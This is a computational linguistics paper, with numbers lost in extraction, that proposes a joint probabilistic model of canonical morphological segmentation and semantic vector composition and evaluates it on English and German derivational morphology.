semantics of the word. for example, the english verb to run takes various forms: run, runs, ran and running, all of which convey “moving by foot quickly”, but ap- pear in complementary syntactic contexts. derivation deals with the formation of new words that have semantic shifts in meaning (often includ- ing pos) and is tightly intertwined with lexical se- mantics (light, ). consider the example of the english noun discontentedness, which is derived from the adjective discontented. it is true that both words share a close semantic relationship, but the transformation is clearly more than a simple inflec- tional marking of syntax. indeed, we can go one step further and define a chain of words content → contented → discontented → discontentedness. in the computational literature, derivational mor- phology has received less attention than inflectional. there are, however, two bodies of work on deriva- tion in computational linguistics. first, there is a series of papers that explore the relation between lexical semantics and derivation (lazaridou et al., ; zeller et al., ; padó et al., ; kisse- lew et al., ). all of these assume a gold mor- phological analysis and primarily focus on the ef- fect of derivation on distributional semantics. 
the second body of work, e.g., the unsupervised mor- phological segmenter morfessor (creutz and la- gus, ), does not deal with semantics and makes no distinction between inflectional and derivational morphology. even though the boundary between inflectional and derivational morphology is a con- tinuum rather than a rigid divide (haspelmath and sims, ), there is still the clear distinction that derivation changes meaning whereas inflection does not. our goal in this paper is to develop an account of how the meaning of a word form can be computed jointly, combining these two lines of work. productivity and semantic coherence. we highlight two related issues in derivation that moti- vated the development of our model: productivity narasimhan et al. ( ) also make no distinction between inflectional and derivational morphology, but their model is an exception in that it includes vector similarity as a semantic fea- ture. see § for discussion. and semantic coherence. roughly, a productive affix is one that can still actively be employed to form new words in a language. for example, the english nominalizing affix ness (red →red+ness) can be attached to just about any adjective, including novel forms. in contrast, the archaic english nominal- izing affix th (dear →dear+th, heal →heal+th, steal →steal+th) does not allow us to form new words such as cheapth. this is a crucial issue in derivational morphology since we would not in general want to analyze new words as having been formed from non-productive endings; e.g., we do not want to analyze hearth as hear+th (or wugth as wug+th). relations such as those between heal and health are lexicalized since they no longer can be derived by productive processes (bauer, ). under a generative treatment (chomsky, ) of morphology, productivity becomes a central no- tion since a grammar needs to account for active word formation processes in the language (aronoff, ). defining productivity precisely, however, is tricky; aronoff ( ) writes, “one of the central mysteries of derivational morphology . . . [is that] . . . though many things are possible in morphology, some are more possible than others.” nevertheless, speakers often have clear intuitions about which af- fixes in the language are productive. related to productivity is the notion of seman- tic coherence. the principle of compositionality (frege, ; heim and kratzer, ) applies to interpretation of words just as it does to phrases. in- deed, compositionality is often taken to be a sig- nal for productivity (aronoff, ). when de- ciding whether to further decompose a word, ask- ing whether the parts sum up to the whole is of- ten a good indicator. in the case of questionably → question+able+ly, the compositional meaning is “in a manner that could be questioned”, which corresponds to the meaning of the word. contrast this with the word unquiet, which means “restless”, rather than “not quiet” and the compound blackmail, which does not refer to a letter written in black ink. the model we will describe in § is a joint model of both semantic coherence and segmentation; that it is also important to distinguish productivity from creativity—a non-rule-governed form of word formation (lyons, ). as an example of creativity, consider the cre- ation of portmanteaux, e.g., dramedy and soundscape. is, an analysis is judged not only by character-level features, but also by the degree to which the word is semantically compositional. 
implicit in such a treatment is the desire to only segment a word if the segmentation is derived from a productive process. while most prior work on morphological segmen- tation has not explicitly modeled productivity, we believe, from a computational modeling perspective, segmenting only productive affixes is preferable. this is analogous to the modeling of phrase compo- sitionality in embedding models, where it can be bet- ter to not further decompose noncompositional mul- tiword units like named entities and idiomatic ex- pressions; see, e.g., mikolov et al. ( b), wang et al. ( ), yin and schütze ( ), yaghoobzadeh and schütze ( ), and hashimoto and tsuruoka ( ). in this paper, we refer to the semantic aspect of the model either as semantic synthesis or as coherence. these are two ways of looking at semantics that are related as follows. if the synthesis (i.e., composi- tion) of the meaning of the derived form from the meaning of its parts is a regular application of the linguistic rules of derivation, then the meaning so constructed is coherent. these are the cases where a joint model is expected to be beneficial for both segmentation and interpretation. a joint model from an nlp perspective, canonical segmentation (naradowsky and goldwater, ; cotterell et al., b) is the task that seeks to algorithmically de- compose a word into its canonical sequence of mor- phemes. it is a version of morphological segmenta- tion that requires the learner to handle orthographic changes that take place during word formation. we believe this is a more natural formulation of mor- phological analysis—especially for the processing note that segmenters such as morfessor utilize the prin- ciple of minimum description length, which implicitly encodes productivity, in order to guide segmentation. as a reviewer points out, productivity of an affix and se- mantic coherence of the words formed from it are not perfectly aligned. nonproductive affixes can produce semantically coher- ent words, e.g., warm →warm+th. productive affixes can pro- duce semantically incoherent words, e.g., canny →un+canny. again, this is analogous to multiword units. however, there is a strong correlation and our experiments show that relying on it gives good results. un question able ly su ffi x su ffi x st em pr ef ix unquestionably + + + unquestionablely ⇡ surface form underlying form segmentation vector composition ta rg et figure : a depiction of the joint model that makes the relation between the three factors and the observed sur- face form explicit. we show a simple additive model of composition for ease of explication. of derivational morphology—as it draws heavily on linguistic notions (see § ). the main innovation we present is the augmen- tation of canonical segmentation to take into ac- count semantic coherence and productivity. con- sider the word hypercuriosity and its canonical seg- mentation hyper+curious+ity; this canonical seg- mentation seeks to decompose the word into its con- stituent morphemes and account for orthographic changes. this amounts to a structural decomposi- tion of the word, i.e., how do we break up the string of characters into chunks? this is similar to the de- composition of a sentence into a parse tree. how- ever, it is also natural to consider the semantic com- positionality of a word, i.e., how is the meaning of the word synthesized from the meaning of the indi- vidual morphemes? 
we consider both of these questions together in a single model, where we would like to place high probability on canonical segmentations that are also semantically coherent. returning to hy- percuriosity, we could further decompose it into hyper+cure+ous+ity in analogy to, say, vice → vicious. nothing about the surface form of curi- ous alone gives us a strong cue that we should rule out the segmentation cure+ous. turning to distri- butional semantics, however, it is the case that the contexts in which curious occurs are quite different from those in which cure occurs. this gives us a strong cue which segmentation is correct. formally, given a word string w ∈ Σ∗, where Σ is a discrete alphabet of characters (in english this could be as simple as the letter lowercase alpha- bet), and a word vector v ∈ v , where v is a set of low-dimensional word embeddings, we define the model as: p(v,s, l,u |w) = zθ(w) exp ( σ ||v −cβ(s,l)|| +f(s,l,u)>η + g(u,w)>ω ) . ( ) this model is composed of three factors: composi- tion factor ( σ ||v−cβ(s,l)|| ), segmentation factor f and transduction factor g. the parameters of the model are θ = {β,η,ω}, the function cβ composes morpheme vectors together, s is the segmentation, l is the labeling of the segments, u is the underlying representation and zθ(w) is the partition function. note that the conditional distribution p(v | s,l,u,w) is gaussian distributed by construction. a visualiza- tion of our model is found in figure . this model is a conditional random field (crf) that is mixed, i.e., it is defined over both discrete and continuous random variables (koller and friedman, ). we restrict the range of u to be a subset of Σ|w|+k, where k is an insertion limit (dreyer, ). in this work, we take k = . explicitly, the partition function is defined as zθ(w) = ∫ ∑ l′,s′,u′ exp ( σ ||v′ −cβ(s′, l′)|| + f(s′, l′,u′)>η + g(u′,w)>ω ) dv′, ( ) which is guaranteed to be finite. a crf is simply the globally renormalized prod- uct of several non-negative factors (sutton and mccallum, ). our model is composed of three: transduction, segmentation and composition factors—we describe each in turn. . transduction factor the first factor we consider is the transduction factor: exp ( g(u,w)>ω ) , which scores a surface since we have capped the insertion limit, we have a finite number of values that u can take for any w. thus, it follows that we have a finite number of canonical segmentations s. hence we take a finite number of gaussian integrals. these integrals all converge since we have fixed the covariance matrix as σ i, which is positive definite. representation (sr) w, the character string ob- served in raw text, and an underlying represen- tation (ur), a character string with orthographic processes reversed. the aim of this factor is to place high weight on good pairs, e.g., the pair (w=questionably,u=questionablely), so we can ac- curately restore character-level changes. we encode this portion of the model as a weighted finite-state machine for ease of computation. this factor generalizes probabilistic edit distance (ristad and yianilos, ) by looking at additional input and output context; see cotterell et al. ( ) for de- tails. as mentioned above and in contrast to cot- terell et al. ( ), we bound the insertion limit in the edit distance model. computing the score be- tween two strings u and w requires a dynamic pro- gram that runs in o(|u|·|w|). this is a generalization of the forward algorithm for hidden markov models (hmms) (rabiner, ). 
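To make the three-factor decomposition concrete, the sketch below computes the unnormalized log-score of one candidate analysis (u, s, l) for a word, assuming the usual Gaussian form of the composition factor (a negative squared distance scaled by 2*sigma^2) plus the two linear feature terms. The feature vectors, parameter values and dimensions are toy stand-ins, not the paper's feature templates or trained parameters.

# Illustrative sketch of the unnormalized log-score of one analysis under the joint model:
#   log score = -||v - c_beta(s, l)||^2 / (2 * sigma^2) + eta . f(s, l, u) + omega . g(u, w)
import numpy as np

def log_score(v, composed, feats_seg, eta, feats_trans, omega, sigma=1.0):
    composition = -np.sum((v - composed) ** 2) / (2.0 * sigma ** 2)   # Gaussian composition factor
    segmentation = float(np.dot(eta, feats_seg))                      # semi-CRF segmentation factor
    transduction = float(np.dot(omega, feats_trans))                  # edit/transduction factor
    return composition + segmentation + transduction

rng = np.random.default_rng(0)
v = rng.normal(size=5)                       # observed word vector, e.g. for "questionably"
composed = v + 0.1 * rng.normal(size=5)      # c_beta(question + able + ly), toy value
feats_seg = np.array([1.0, 0.0, 1.0])        # toy indicator features of the segmentation
feats_trans = np.array([1.0, 1.0])           # toy features of the u -> w edit sequence
eta = np.array([0.5, -0.2, 0.3])
omega = np.array([0.4, 0.1])
print(log_score(v, composed, feats_seg, eta, feats_trans, omega))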
we employ standard feature templates for the task that look at features of edit operations, e.g., substi- tute i for y, in varying context granularities. see cotterell et al. ( b) for details. recent work has also explored weighting of wfst arcs with scores computed by lstms (hochreiter and schmidhuber, ), obviating the need for human selection of feature templates (rastogi et al., ). . segmentation factor the second factor is the segmentation factor: exp ( f(s,l,u)>η ) . the goal of this factor is to score a segmentation s of a ur u. in our example, it scores the input-output pair (u=questionablely, s=question+able+ly). it additionally scores a labeling of the segmentation. our label set in this work is l = {stem, prefix, suffix}. the proper labeling of the segmentation above is l=question:stem+able:suffix+ly:suffix. the label- ing is critical for our composition functions cβ (cot- terell et al., ): which vectors are used depends on the label given to the segment; e.g., the vectors of the prefix “post” and the stem “post” are different. we can view this factor as an unnormalized first- as our transduction model is an unnormalized factor in a crf, we do not require the local normalization discussed in cotterell et al. ( )—a weight on an edge may be any non- negative real number since we will renormalize later. the un- derlying model, however, remains the same. model composition function stem c = ∑n i= li=stemm li si mult c = ⊙n i= m li si add c = ∑n i= m li si wadd c = ∑n i= αim li si fulladd c = ∑n i= uim li si lds hi = xhi− + umlisi rnn hi = tanh(xhi− + umlisi ) table : composition models cβ(s,l) used in this and prior work. the representation of the word is hn for the dynamic and c for the non-dynamic models. note that for the dynamic models h is a learned parameter. order semi-crf (sarawagi and cohen, ). com- putation of the factor again requires dynamic pro- gramming. the algorithm is a different generaliza- tion of the forward algorithm for hmms, one that extends it to the semi-markov case. this algorithm runs in o(|u| · |l| ). features. we again use standard feature templates for the task. we create atomic indicator features for the individual segments. we then conjoin the atomic features with left and right context features as well as the label to create more complex feature templates. we also include transition features that fire on pairs of sequential labels. see cotterell et al. ( ) for details. recent work has also showed that a neural parameterization can remove the need for manual feature design (kong et al., ). . composition factor the composition factor takes the form of an unnormalized multivariate gaussian density: exp ( σ ||v −cβ(s,l)|| ) , where the mean is computed by the (potentially non-linear) compo- sition function (see table ) and the covariance matrix σ i is a diagonal matrix. the goal of the composition function cβ(s,l) is to stitch together morpheme embeddings to approximate the vector of the entire word. the simplest form of the composition function cβ(s,l) is add, an additive model of the morphemes. see table : each vector mlisi refers to a morpheme- specific, label-dependent embedding. if li = stem, then si represents a stem morpheme. given that our segmentation is canonical, an si that is a stem gen- erally itself is an entry in the lexicon and v(si) ∈ v . if v(si) ∈ v , then we set v(si) to . we optimize over vectors with li ∈ {prefix, suffix} as they corre- spond to bound morphemes. 
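The table of composition functions above is flattened by extraction. As far as it can be read, the formulas it lists are approximately the following, where m^{l_i}_{s_i} is the label-dependent embedding of segment s_i; for the dynamic models the word representation is the final hidden state h_n (with h_0 a learned parameter), and for the others it is c.

```latex
\begin{aligned}
\text{stem:}\quad    & c = \sum_{i\,:\,l_i=\text{stem}} m^{l_i}_{s_i} \\
\text{mult:}\quad    & c = \bigodot_{i=1}^{n} m^{l_i}_{s_i} \\
\text{add:}\quad     & c = \sum_{i=1}^{n} m^{l_i}_{s_i} \\
\text{wadd:}\quad    & c = \sum_{i=1}^{n} \alpha_i\, m^{l_i}_{s_i} \\
\text{fulladd:}\quad & c = \sum_{i=1}^{n} U_i\, m^{l_i}_{s_i} \\
\text{lds:}\quad     & h_i = X h_{i-1} + U\, m^{l_i}_{s_i} \\
\text{rnn:}\quad     & h_i = \tanh\!\big(X h_{i-1} + U\, m^{l_i}_{s_i}\big)
\end{aligned}
```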
we also consider a more expressive composition model, a recurrent neural network (rnn). let n be the number of segments. then cβ(s,l) = hn where hi is a hidden vector, defined by the re- cursion: hi = tanh ( xhi− + um li si ) (elman, ). again, we optimize the morpheme embed- dings mlisi only when li = stem along with the other parameters of the rnn, i.e., the matrices u and x. inference and learning exact inference is intractable since we allow ar- bitrary segment-level features on the canonicalized word forms u. since the semi-crf factor has fea- tures that fire on substrings, we would need a dy- namic programming state for each substring of each of the exponentially many settings of u; this breaks the dynamic program. we thus turn to approximate inference through an importance sampling routine (rubinstein and kroese, ). . inference by importance sampling rather than considering all underlying orthographic forms u and segmentations s, we sample from a tractable proposal distribution q—a distribution over canonical segmentations. in the following equations we omit the dependence on w for notational brevity and define h(l,s,u) = f(s,l,u) + g(u,w). cru- cially, the partition function zθ(w) is not a function of parameter subvector β and its gradient with re- this is not changed in training, so all such v(si) are in the final model. clearly, this could be improved in future work as a reviewer points out, e.g., by setting such v(si) to an average of a suitable chosen set of known word vectors. we do not explore more complex rnns, e.g., lstms (hochreiter and schmidhuber, ) and grus (cho et al., a) as words in our data have ≤ morphemes. these archi- tectures make the learning of long distance dependencies eas- ier, but are no more powerful than an elman rnn, at least in theory. note that perhaps if applied to languages with richer derivational morphology than english, considering more com- plex neural architectures would make sense. spect to β is . recall that computing the gradi- ent of the log-partition function is equivalent to the problem of marginal inference (wainwright and jor- dan, ). we derive our estimator as follows: ∇θ log z = e (l,s,u)∼p [h(l,s,u)] ( ) = ∑ l,s,u p(l,s,u)h(l,s,u) ( ) = ∑ l,s,u q(l,s,u) q(l,s,u) p(l,s,u)h(l,s,u) ( ) = e (l,s,u)∼q [ p(l,s,u) q(l,s,u) h(l,s,u) ] , ( ) where we have omitted the dependence on w (which we condition on) and v (which we marginalize out). so long as q has support everywhere p does (i.e., p(l,s,u) > ⇒ q(l,s,u) > ), the estimate is un- biased. unfortunately, we can only efficiently com- pute p(l,s,u) up to a constant factor, p(l,s,u) = p̄(l,s,u)/z′θ(w). thus, we use the indirect impor- tance sampling estimator, ∑m i= w (i) m∑ i= w(i)h(l(i),s(i),u(i)), ( ) where (l( ),s( ),u( )) . . . (l(m),s(m),u(m)) i.i.d.∼ q and importance weights w(i) are defined as: w(i) = p̄(l(i),s(i),u(i)) q(l(i),s(i),u(i)) . ( ) this indirect estimator is biased, but consistent. proposal distribution. the success of impor- tance sampling depends on the choice of a “good” proposal distribution, i.e., one that ideally is close to p. since we are fully supervised at training time, we have the option of training locally normalized distributions for the individual components. 
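The estimator derived above is garbled in this copy. Written out, with h(l,s,u) = f(s,l,u) + g(u,w) as defined in the text, the identity and the self-normalized (indirect) estimator are approximately:

```latex
\nabla_\theta \log Z_\theta(w)
  = \mathbb{E}_{(l,s,u)\sim p}\big[h(l,s,u)\big]
  = \mathbb{E}_{(l,s,u)\sim q}\!\left[\frac{p(l,s,u)}{q(l,s,u)}\, h(l,s,u)\right]
  \approx \frac{\sum_{i=1}^{m} w^{(i)}\, h\big(l^{(i)},s^{(i)},u^{(i)}\big)}{\sum_{i=1}^{m} w^{(i)}},
\qquad
w^{(i)} = \frac{\bar{p}\big(l^{(i)},s^{(i)},u^{(i)}\big)}{q\big(l^{(i)},s^{(i)},u^{(i)}\big)},
```

where the samples (l^(i), s^(i), u^(i)) are drawn i.i.d. from the proposal q and p̄ denotes the unnormalized model probability.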
con- cretely, we train two proposal distributions q (u | w) and q (l,s | u) that take the form of a wfst and a semi-crf, respectively, using features identical the subvector β is responsible for computing only the mean of the gaussian factor and thus has no impact on its nor- malization coefficient (murphy, ). informally, the indirect importance sampling estimate con- verges to the true expectation as m → ∞ (the definition of statistical consistency). to the joint model. each of these distributions is tractable—we can compute the marginals with dy- namic programming and thus sample efficiently. to draw samples (l,s,u) ∼ q, we sample sequentially from q and then q , conditioned on the output of q . . learning we optimize the log-likelihood of the model using adagrad (duchi et al., ), which is sgd with a special per-parameter learning rate. the full gra- dient of the objective for one training example is: ∇θ log p(v,s, l,u | w) = f(s,l,u)> + g(u,w)> − σ (v −cβ(s,l))∇θcβ(s,l) −∇θ log zθ(w), ( ) where we use the importance sampling algorithm described in § . to approximate the gradient of the log-partition function, following bengio and senecal ( ). note that ∇θcβ(s,l) depends on the composition function used. in the most com- plicated case when cβ is a rnn, we can com- pute ∇βcβ(s,l) efficiently with backpropagation through time (werbos, ). we take m = im- portance samples; using so few samples can lead to a poor estimate of the gradient, but for our application it suffices. we employ l regularization. . decoding decoding the model is also intractable. to approxi- mate the solution, we again employ importance sam- pling. we take m = , importance samples and select the highest weighted sample. related work the idea that vector semantics is useful for mor- phological segmentation is not new. count vectors (salton, ; turney and pantel, ) have been shown to be beneficial in the unsupervised induction of morphology (schone and jurafsky, ; schone and jurafsky, ). embeddings were shown to act similarly (soricut and och, ). our method differs from this line of research in two key ways. (i) we present a probabilistic model of the pro- cess of synthesizing the word’s meaning from the meaning of its morphemes. prior work was ei- ther not probabilistic or did not explicitly model morphemes. (ii) our method is supervised and fo- cuses on derivation. schone and jurafsky ( ) and soricut and och ( ), being fully unsupervised, do not distinguish between inflection and deriva- tion and schone and jurafsky ( ) focus on in- flection. more recently, narasimhan et al. ( ) look at the unsupervised induction of “morpholog- ical chains” with semantic vectors as a crucial fea- ture. their goal is to jointly figure out an ordering of word formation and a morphological segmenta- tion, e.g., play →playful →playfulness. while it is a rich model like ours, theirs differs in that it is un- supervised and uses vectors as features, rather than explicitly treating vector composition. all of the above work focuses on surface segmentation and not canonical segmentation, as we do. a related line of work that has different goals con- cerns morphological generation. two recent papers that address this problem using deep learning are faruqui et al. ( a) and faruqui et al. ( b). in an older line of work, yarowsky and wicen- towski ( ) and wicentowski ( ) exploit log frequency ratios of inflectionally related forms to tease apart that, e.g., the past tense of sing is not singed, but instead sang. 
related work by dreyer and eisner ( ) uses a dirichlet process to model a corpus as a “mixture of a paradigm”, allowing for the semi-supervised incorporation of distribu- tional semantics into a structured model of inflec- tional paradigm completion. our work is also related to recent attempts to in- tegrate morphological knowledge into general em- bedding models. for example, botha and blun- som ( ) train a log-bilinear language model that models the composition of morphological structure. likewise, luong et al. ( ) train a recursive neural network (goller and küchler, ) over a heuristi- cally derived tree structure to learn morphological composition over continuous vectors. our work is different in that we learn a joint model of segmen- tation and composition. moreover, supervised mor- phological analysis can drastically outperform unsu- pervised analysis (ruokolainen et al., ). early work by kay ( ) can be interpreted as finite-state canonical segmentation, but it neither ad- dresses nor experimentally evaluates the question of joint modeling of morphological analysis and se- mantic synthesis. moreover, we may view canoni- dev test model acc f edit acc f edit e n semi-crf (baseline) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint (baseline) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint + vec (this work) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint + ur (oracle) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint + ur + vec (oracle) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) d e semi-crf (baseline) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint (baseline) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint + vec (this work) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint + ur (oracle) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint + ur + vec (oracle) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) table : results for the canonical morphological segmentation task on english and german. standard deviation is given in parentheses. we compare against two baselines that do not make use of semantic vectors: (i) “semi-crf (baseline)”, a semi-crf that cannot account for orthographic changes and (ii) “joint (baseline)”, a version of our joint model without vectors. we also compare against an oracle version with access to gold urs (“joint + ur (oracle)”, “joint + ur + vec (oracle)”), revealing that the toughest part of the canonical segmentation task is reversing the orthographic changes. calization as an orthographic analogue to phonology. on this interpretation, the finite-state systems of ka- plan and kay ( ), which computationally apply spe-style phonological rules (chomsky and halle, ), may be run backwards to get canonical un- derlying forms. experiments and results we conduct experiments on english and german derivational morphology. we analyze our joint model’s ability to segment words into their canoni- cal morphemes as well as its ability to composition- ally derive vectors for new words. finally, we ex- plore the relationship between distributional seman- tics and morphological productivity. for english, we use the pretrained vectors of levy and goldberg ( a) for all experiments. for german, we train word vec skip-gram vectors on the german wikipedia. we first describe our en- glish dataset, the subset of the english portion of the celex lexical database (baayen et al., ) that was selected by lazaridou et al. ( ); the dataset contains , forms. this allows for com- parison with previously proposed methods. we make two modifications. (i) lazaridou et al. 
( ) make the two-morpheme assumption: every word is composed of exactly two morphemes. in general, this is not true, so we further segment all complex words in the corpus. for example, friendless+ness is further segmented into friend+less+ness. to nevertheless allow for fair comparison, we pro- vide versions of our experiments with and without the two-morpheme assumption where appropriate. (ii) lazaridou et al. ( ) only provide a single train/test split. as we require a held-out develop- ment set for hyperparameter tuning, we randomly allocate a portion of the training data to select the hyperparameters and then retrain the model using these parameters on the original train split. we also report -fold cross validation results in addition to lazaridou et al.’s train/test split. our german dataset is taken from zeller et al. ( ) and is described in cotterell et al. ( b). it, again, consists of , derivational forms. we report results on -fold cross validation. . experiment : canonical segmentation for our first experiment, we test whether jointly modeling the continuous representations allows us to segment words more accurately. we assume that we are given an embedding for the target word. we estimate the model p(v,s, l,u | w) as described in § with l regularization λ||θ|| . to evaluate, we decode the distribution p(s,l,u | v,w). we per- form approximate map inference with importance sampling—taking the sample with the highest score. en de bow bow deps sg dev test dev test dev test dev test or ac le stem . . . . . . . . add . . . . . . . . lds . . . . . . . . rnn . . . . . . . . jo in t stem . . . . . . . . add . . . . . . . . lds . . . . . . . . rnn . . . . . . . . ch ar gru . . . . . . . . lstm . . . . . . . . table : vector approximation (measured by mean co- sine similarity) both with (“oracle”) and without (“joint”, “char”) gold morphology. surprisingly, joint models are close in performance to models with gold morphology. in these experiments, we use the rnn with the de- pendency vectors, the combination of which per- forms best on vector approximation in § . . we follow the experimental design of cotterell et al. ( b). we compare against two base- lines (marked “baseline” in table ): (i) a “semi- crf” segmenter that cannot account for ortho- graphic changes and (ii) the full “joint” model of cotterell et al. ( b). we additionally consider an “oracle” setting, where we give the model the gold underlying orthographic form (“ur”) at both training and test time. this gives us insight into the performance of the transduction factor of our model, i.e., how much could we benefit from a richer model. our hyperparameters are (i) the regularization coefficient λ and (ii) σ , the variance of the gaussian factor. we use grid search to tune them: λ ∈ { . , , , , , }, σ ∈ { . , . , . , . }. metrics. we use three metrics to evaluate segmen- tation accuracy. note that the evaluation of canon- ical segmentation is hard since a system may re- turn a sequence of morphemes whose concatenation is not the same length as the concatenation of the gold morphemes. this rules out metrics for surface segmentation like border f (kurimo et al., ), which require the strings to be of the same length. we now define the metrics. (i) segmentation accuracy measures whether every single canonical morpheme in the returned sequence is correct. it is inflexible: closer answers are penalized the same as i.e., a model without the gaussian factor that scores vectors. more distant answers. 
(ii) morpheme f (van den bosch and daelemans, ) takes the predicted se- quence of canonical morphemes, turns it into a set, computes precision and recall in the standard way and based on that then computes f . this metric gives credit if some of the canonical morphemes were correct. (iii) levenshtein distance joins the canonical segments with a special symbol # into a single string and computes the levenshtein distance between predicted and gold strings. discussion. results in table show that jointly modeling semantic coherence improves our ability to analyze words. for test, our proposed joint model (“this work”) outperforms the baseline supervised canonical segmenter, which is state-of-the-art for the task, by . (resp. . ) on accuracy and . (resp. . ) on f for english (resp. german). we also find that when we give the joint model an oracle ur the vectors generally help less: . (resp. . ) on ac- curacy and . (resp. . ) on f for english (resp. german). this indicates that the chief boon the vec- tor composition factor provides lies in selection of an appropriate ur. moreover, the up to . differ- ence in english between systems with and without the oracle ur suggests that reversing orthographic changes is a particularly difficult part of the task, at least for english. . experiment : vector approximation we adopt the experimental design of lazaridou et al. ( ). its aim is to approximate a vector of a derivationally complex word using a learned model of composition. as lazaridou et al. ( ) assume a gold morphological analysis, we compare two set- tings: (i) oracle morphological analysis and (ii) in- ferred morphological analysis. to the best of our knowledge, (ii) is a novel experimental condition that no previous work has addressed. we consider four composition models (see ta- ble ). (i) stem, using just the stem vector. this baseline tells us what happens if we make the incor- rect assumption that derivation behaves like inflec- tion and is not meaning-changing. (ii) add, a purely additive model. this is arguably the simplest way of combining the vectors of the morphemes. (iii) lds, a linear dynamical system. this is arguably the sim- plest sequence model. (iv) a (simple) rnn. recur- all hr lr -less in- un- l az ar id ou stem . . . . . . mult . . . . . . dil. . . . . . . wadd . . . . . . fulladd . . . . . . lexfunc . . . . . . b o w stem . . . . . . add . . . . . . lds . . . . . . rnn . . . . . . c-gru . . . . . . c-lstm . . . . . . b o w stem . . . . . . add . . . . . . lds . . . . . . rnn . . . . . . c-gru . . . . . . c-lstm . . . . . . d e p s stem . . . . . . add . . . . . . lds . . . . . . rnn . . . . . . c-gru . . . . . . c-lstm . . . . . . table : vector approximation (measured by mean cosine similarity) with gold morphology on the train/test split of lazaridou et al. ( ). hr/lr = high/low-relatedness words. see lazaridou et al. ( ) for details. rent neural networks are currently the most widely used nonlinear sequence model and simple rnns are the simplest such models. part of the motivation for considering a richer class of models lies in our removal of the two- morpheme assumption. indeed, it is unclear that the wadd and fulladd models (mitchell and lapata, ) are useful models in the general case of multi- morphemic words—the weights are tied by position, i.e., the first morpheme’s vector (be it a prefix or stem) is always multiplied by the same matrix. comparison with lazaridou et al. to compare with lazaridou et al. ( ), we use their exact train/test split. 
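The evaluation metrics used in this and the following experiment are simple enough to state directly. The sketch below is not the authors' evaluation code, only a plain reading of the definitions given above: exact-match accuracy over the canonical morpheme sequence, set-based morpheme F1, Levenshtein distance over '#'-joined segments, and the mean cosine similarity reported in the vector approximation tables. Function names are invented. The comparison itself is reported next.

```python
import numpy as np

def segmentation_accuracy(pred, gold):
    # exact match of the full canonical morpheme sequence,
    # e.g. ["un", "question", "able", "ly"] vs. the gold segmentation
    return float(pred == gold)

def morpheme_f1(pred, gold):
    # set-based precision/recall over predicted vs. gold canonical morphemes
    p, g = set(pred), set(gold)
    tp = len(p & g)
    if tp == 0:
        return 0.0
    precision, recall = tp / len(p), tp / len(g)
    return 2 * precision * recall / (precision + recall)

def levenshtein(a, b):
    # standard dynamic-programming edit distance between two strings
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                # deletion
                           cur[j - 1] + 1,             # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]

def segment_edit_distance(pred, gold):
    # join canonical segments with '#' and compare the resulting strings
    return levenshtein("#".join(pred), "#".join(gold))

def mean_cosine_similarity(predicted_vecs, gold_vecs):
    # one row per held-out word: the composed vector vs. its corpus vector
    sims = []
    for p, g in zip(predicted_vecs, gold_vecs):
        denom = np.linalg.norm(p) * np.linalg.norm(g)
        sims.append(float(p @ g) / denom if denom > 0 else 0.0)
    return float(np.mean(sims))
```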
those results are reported in table . this dataset enforces that all words are composed of exactly two morphemes. thus, a word like unques- tionably is segmented as un+questionably, with- out further decomposition. the vectors employed by lazaridou et al. ( ) are high-dimensional count vectors derived from lemmatized and pos tagged text with a before-and-after window of size . they then apply pointwise mutual informa- tion (pmi) weighting and dimensionality reduction by non-negative matrix factorization. in contrast, we employ word vec (mikolov et al., a), a model that is also interpretable as the factorization of a pmi matrix (levy and goldberg, b). we con- sider three word vec models: two bag-of-word (bow) models with before-and-after windows of size and and deps (levy and goldberg, a), a dependency-based model whose context is derived from dependency parses rather than bow. in general, the results indicate that the key to better vector approximation is not a richer model of composition, but rather lies in the vectors them- selves. we find that our best model, the rnn, only marginally edges out the lds. additionally, looking at the “all” column and the deps vectors, the sim- ple additive model is only ≤. lower than lds. in comparison, we observe large differences between the vectors. the rnn+deps model is . bet- ter than the bow models (. vs. . ), . better than the bow models (. vs. . ) and . bet- ter than lazaridou et al.’s best model (. vs. . ). a wider context for bow ( instead of ) yields worse results. this suggests that syntactic infor- mation or at least positional information is neces- sary for improved models of morpheme composi- tion. the test vectors are annotated for relatedness, which is a proxy for semantic coherence. hr (high- relatedness) words were judged to be more compo- sitional than lr (low-relatedness) words. character-level neural retrofitting. as a fur- ther strong baseline, we consider a retrofitting (faruqui et al., ) approach based on character- level recurrent neural networks. recently, running a recurrent net over the character stream has become a popular way of incorporating subword information into a model—empirical gains have been observed in a diverse set of nlp tasks: pos tagging (dos santos and zadrozny, ; ling et al., ), pars- ing (ballesteros et al., ) and language modeling (kim et al., ). to the best of our knowledge, character-level retrofitting is a novel approach. given a vector v for a word form w, we seek a function to minimize the following objective ||v −hn|| , ( ) where hn is the final hidden state of a recurrent neu- ral architecture, i.e., hi = σ(ahi− + bwi), ( ) where σ is a non-linearity and wi is the ith char- acter in w, hi− is the previous hidden state and a and b are matrices. while we have defined the architecture for a vanilla rnn, we experiment with two more advanced recurrent architectures: grus (cho et al., b) and lstms (hochreiter and schmidhuber, ) as well as deep variants (sutskever et al., ; gillick et al., ; firat et al., ). importantly, this model has no knowledge of morphology—it can only rely on representations it extracts from the characters. this gives us a clear ablation on the benefit of adding structured morpho- logical knowledge. we optimize the depth and the size of the hidden units on development data using a coarse-grained grid search. we found a depth of and hidden units of size (in both lstm and gru) performed best. 
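The retrofitting objective and recursion above are mangled in this copy. Restated, with A and B the learned matrices and w_i an encoding of the i-th character of the word w, the character-level baseline minimizes approximately:

```latex
\min_{A,\,B}\ \big\lVert\, v - h_n \,\big\rVert^2,
\qquad
h_i = \sigma\!\big(A\,h_{i-1} + B\,w_i\big),\quad i = 1,\dots,n,
```

with h_n the final hidden state of the recurrence; the stronger baselines replace this Elman-style recursion with GRU or LSTM cells.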
